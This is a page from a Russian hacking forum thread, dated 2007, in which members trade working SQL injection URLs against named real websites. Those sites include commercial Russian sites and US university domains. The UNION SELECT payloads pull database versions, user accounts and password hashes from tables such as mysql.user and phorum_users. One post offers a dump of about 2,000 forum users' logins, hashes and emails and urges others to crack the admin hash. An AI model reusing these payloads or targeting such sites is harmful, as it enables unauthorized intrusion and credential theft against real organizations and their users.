ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #651  
Старый 01.03.2007, 23:43
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.ergo-line.ru/operative/sng/?saleID=-1+union+select+1,2,concat(user(),char(58),database (),char(58),version()),4,5,6,7,8,9,10,11,12/*

__http://www.vechnayamolodost.ru/index2.php?idtopmenu=2&idsubmenu=-133+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8,9,0,11,12,13,14+from+mysql.user/*
 
Ответить с цитированием

  #652  
Старый 02.03.2007, 00:18
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
ошибка в mssql, стоит на винде
http://publicsafetyinfo.wvu.edu/Transcript/?id=1+or+1=(select+TOP+1+table_name+from+INFORMATI ON_SCHEMA.TABLES)--
 
Ответить с цитированием

  #653  
Старый 02.03.2007, 00:49
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

http://www.area3d.ch/downloads.php?cat=-99'+union+select+1,2,3/*
опять нифига не подобрал)) выведите юзеров булки лучше
 
Ответить с цитированием

  #654  
Старый 02.03.2007, 01:06
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

2 _Pantera_
у меня этих скулей в эду доменах...
эта уже пару месяцев лежит, вот
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access
 
Ответить с цитированием

  #655  
Старый 02.03.2007, 01:08
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION_SCHEMA.TABLES/*
можете покопаться там много таблиц)

Код:
http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+phorum_users/*
база 2к юзеров login:md5hash:email:: с форума

можете покопаться) хэш там расшифровать админский или другие таблицы глянуть..) я заколебался)
 
Ответить с цитированием

  #656  
Старый 02.03.2007, 02:37
Аватар для Spot
Spot
Новичок
Регистрация: 01.03.2007
Сообщений: 2
Провел на форуме:
3478

Репутация: 0
По умолчанию

http://chaoscity.chaosroad.com/kernel/class/class.mysql.php

Вообще реально,что нибудь дальше?...подскажите нубу =)
 
Ответить с цитированием

  #657  
Старый 02.03.2007, 10:10
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

нет
 
Ответить с цитированием

  #658  
Старый 02.03.2007, 14:20
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.center-torg.ru/?pageId=2&catId=-1+union+select+1,table_name,3,4,5,6,7+from+INFORMA TION_SCHEMA.TABLES/*

__http://www.master-office.ru/index.php?l=2&pid=-1+union+select+1,2,user(),4,5,6,7/*

__http://www.kroki.ru/view_catalog.php?mtypeid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5/*
 
Ответить с цитированием

  #659  
Старый 02.03.2007, 15:58
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://www.ttg-java.ru/photo/gallery.php?_id=-1+union+select+1,version(),3,4/*
Код:
http://www.mobitronic.ru/index.php?part_id=-1+union+select+1,user()/*
Код:
http://www.gday.ru/print.php?cat=99999+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15/*
Код:
http://www.marinastilist.ru/foto.php?cat=-1+union+select+1,2,3,user(),5/*
 
Ответить с цитированием

  #660  
Старый 02.03.2007, 20:57
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.wingspan.org/content/evt_details.php?event_id=-33+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33
][еК
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ